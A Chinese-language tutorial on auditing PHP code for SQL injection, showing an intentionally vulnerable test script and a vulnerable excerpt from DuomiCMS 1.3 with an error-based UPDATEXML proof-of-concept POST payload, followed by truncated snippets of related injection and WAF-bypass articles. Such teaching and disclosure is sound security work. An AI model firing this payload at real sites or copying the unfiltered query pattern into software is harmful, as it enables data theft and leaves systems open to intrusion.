PHP代码审计SQL注入篇

什么是SQL注入

SQL注入攻击(SQL Injection),简称注入攻击,是Web开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。

而造成SQL注入的原因是因为程序没有有效过滤用户的输入,使攻击者成功的向服务器提交恶意的SQL查询代码,程序在接收后错误的将攻击者的输入作为查询语句的一部分执行,导致原始的查询逻辑被改变,额外的执行了攻击者精心构造的恶意代码。

SQL注入实例

很多Web开发者没有意识到SQL查询是可以被篡改的,从而把SQL查询当作可信任的命令。殊不知,SQL查询是可以绕开访问控制,从而绕过身份验证和权限检查的。更有甚者,有可能通过SQL查询去运行主机系统级的命令。

下面将通过一些真实的例子来详细讲解SQL注入的方式。

测试代码如下:

    

  1. <?php
    2. 

  2. $uid=$_GET[‘id‘]; 
    3. 

  3. $sql="SELECT * FROM userinfo where id=$uid";
    4. 

  4. $conn=mysql_connect (‘localhost‘,‘root‘,‘root‘);
    5. 

  5. mysql_select_db("sql",$conn);
    6. 

  6. $result=mysql_query($sql,$conn);
    7. 

  7. print_r(‘当前SQL语句: ‘.$sql.‘ 结果: ‘);
    8. 

  8. print_r(mysql_fetch_row($result));
    9. 

  9. ?>
    10.

首先我们看一下代码:

    

  1. $uid=$_GET[‘id‘]; //获取GET值
    2. 



    

  1. $sql="SELECT * FROM userinfo where id=$uid"; //执行SQL语句
    2. 



    

  1. $conn=mysql_connect (‘localhost‘,‘root‘,‘root‘);
    2. 

  2. mysql_select_db("sql",$conn); //数据库配配置
    3. 



    

  1. $result=mysql_query($sql,$conn); //进行查询SQL语句
    2. 



    

  1. print_r(‘当前SQL语句: ‘.$sql.‘ 结果: ‘);
    2. 

  2. print_r(mysql_fetch_row($result)); //进行打印输出没有任何的过滤所以利用简单的SQL注入语句就可以直接查询相关需要的信息。
    3.

从截图可以看出原本的SQL语句已被注入更改,使用了UNION查询到当前用户。

另外一个多米CMS最新版1.3版本注入实例。

漏洞文件member/mypay.php(14-40行)

    

  1. if(empty($_SESSION[‘duomi_user_id‘])){
    2. 

  2.     showMsg("请先登录","login.php");
    3. 

  3.     exit();
    4. 

  4. }
    5. 

  5. elseif($dm==‘mypay‘){
    6. 

  6.     $key=$_POST[‘cardkey‘];
    7. 

  7.     if($key==""){showMsg("请输入充值卡号","-1");exit;}
    8. 

  8.     $pwd=$_POST[‘cardpwd‘];
    9. 

  9.     if($pwd==""){showMsg("请输入充值卡密码","-1");exit;}
    10. 

  10.     $sqlt="SELECT * FROM duomi_card where ckey=‘$key‘";
    11. 

  11.     $sqlt="SELECT * FROM duomi_card where cpwd=‘$pwd‘";
    12. 

  12.        $row1 = $dsql->GetOne($sqlt);
    13. 

  13.     if(!is_array($row1) OR $row1[‘status‘]<>0){
    14. 

  14.         showMsg("充值卡信息有误","-1");exit;
    15. 

  15.     }else{
    16. 

  16.         $uname=$_SESSION[‘duomi_user_name‘];
    17. 

  17.         $points=$row1[‘climit‘];
    18. 

  18.         $dsql->executeNoneQuery("UPDATE duomi_card SET    usetime=NOW(),uname=‘$uname‘,status=‘1‘ WHERE ckey=‘$key‘");
    19. 

  19.         $dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname=‘$uname‘,status=‘1‘ WHERE cpwd=‘$pwd‘");
    20. 

  20.         $dsql->executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username=‘$uname‘");
    21. 

  21.         showMsg("恭喜!充值成功!","mypay.php");exit;
    22. 

  22.     }
    23. 

  23. }
    24. 

  24. else
    25. 

  25. {
    26.

此处的”cardpwd”变量没有进行过滤就以POST提交方式传入了数据库造成注入。 构造POC如下(注意此处需要注册用户并且登陆详情请看该文件1-17行):

    

  1. http://localhost/member/mypay.php?dm=mypay
    2. 

  2. POST:cardpwd=-1‘ AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and ‘1‘=‘1
    3.

来自为知笔记(Wiz)

时间: 2024-10-14 12:15:18

PHP代码审计SQL注入篇的相关文章

[转载]我的WafBypass之道(SQL注入篇)

现在位置: 首页 > 文章 > Web安全 > 正文 我的WafBypass之道(SQL注入篇) 2016 /11/23 16:16 6,444 评论 3 条 [本文转自安全脉搏战略合作伙伴先知技术社区 原帖地址  安全脉搏编辑huan9740整理发布] 0x00 前言 去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常 谈的话题也没什么可写的. 很多人一遇到waf就发懵,不知如何是好,能搜到的各 种姿势也是然并卵. 但是积累姿势的过程也是迭代的,那么就有了此文,用来

我的WafBypass之道(SQL注入篇)

原帖地址:https://xianzhi.aliyun.com/forum/read/349.html 0x00 前言 去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常 谈的话题也没什么可写的. 很多人一遇到waf就发懵,不知如何是好,能搜到的各 种姿势也是然并卵. 但是积累姿势的过程也是迭代的,那么就有了此文,用来总 结一些学习和培养突破waf的思想. 可能总结的并不全,但目的并不是讲那些网上 搜来一大把的东西,So-并不会告诉大家现有的姿势, 而是突破Waf Bypas

ASP.NET 之 防SQL注入篇

1. 什么是SQL注入     所谓SQL注入,就是通过把SQL命令插入到表单窗体递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行一些恶意的SQL命令.通过递交参数构造巧妙的SQL语句,从而成功获取想要的数据. 2. SQL注入的种类从具体而言,SQL注入可分为五大类,分别是:数字型注入.字符型注入.搜索型注入(like).in型的注入.句语连接型注入.从应用来说,要特别注意IP.搜索.批量删除.从数据库转到数据库等地方的SQL注入. 3,如何进行的注入 下面我们看一个典型例子 1S

Sql server之sql注入篇

SQL Injection 关于sql注入的危害在这里就不多做介绍了,相信大家也知道其中的厉害关系.这里有一些sql注入的事件大家感兴趣可以看一下 防范sql注入的方法无非有以下几种: 1.使用类型安全的SQL参数2.使用参数化输入存储过程3.使用参数集合与动态SQL4.输入滤波5.过滤LIKE条款的特殊字符 ...如果有遗漏的也欢迎园子的大大们指教. Sample: var Shipcity; ShipCity = Request.form ("ShipCity"); var sql

SQL注入学习资料总结

转载自:https://bbs.ichunqiu.com/thread-12105-1-1.html  什么是SQL注入 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言.1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准.不过各种通行的数据库系统在其实践过程中都

Web安全篇之SQL注入攻击

在网上找了一篇关于sql注入的解释文章,还有很多技术,走马观花吧 文章来源:http://www.2cto.com/article/201310/250877.html ps:直接copy,格式有点问题~ 大家早上好!今天由我给大家带来<web安全之SQL注入篇>系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:       第一讲:"纸上谈兵:我们需要在本地架设注入环境,构造注入语句,了解注入原理.":       第二讲:"实战演练:我们要在互联网上

sql注入二

大家早上好!今天由我给大家带来<web安全之SQL注入篇>系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:        第一讲:“纸上谈兵:我们需要在本地架设注入环境,构造注入语句,了解注入原理.”:        第二讲:“实战演练:我们要在互联网上随机对网站进行友情检测,活学活用,举一反三”:        第三讲:“扩展内容:挂马,提权,留门.此讲内容颇具危害性,不予演示.仅作概述”.     这个主题涉及的东西还是比较多的,结合我们前期所学.主要是让大家切身体会一下,管中

Java代码审计连载之—SQL注入

前言近日闲来无事,快两年都没怎么写代码了,打算写几行代码,做代码审计一年了,每天看代码都好几万行,突然发现自己都不会写代码了,真是很DT.想当初入门代码审计的时候真是非常难,网上几乎找不到什么java审计的资料,摸索了很长时间,搜到的也仅仅讲了点原理,为了给想学java代码审计的朋友门一点入门资料,就开始写<java代码审计连载>系列文章,本文章适合初学者,大牛留下脚印后请绕过,若代码有什么其他问题请忽略,因为那不是重点,此片只讲述SQL注入.本次写了两个简单的页面,一个登陆页面,一个查询id

【PHP代码审计】 那些年我们一起挖掘SQL注入 - 3.全局防护Bypass之Base64Decode

0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.同上一篇,我们需要找一些编码解码的函数来绕过全局防护,本篇介绍base64decode()的情况.漏洞来源于乌云:http://www.wooyun.org/bugs/wooyun-2014-050338 0x02 环境搭建 看背景我们使用了低版本的easytalk程序,版本为X2.4①源码我打包了一份:htt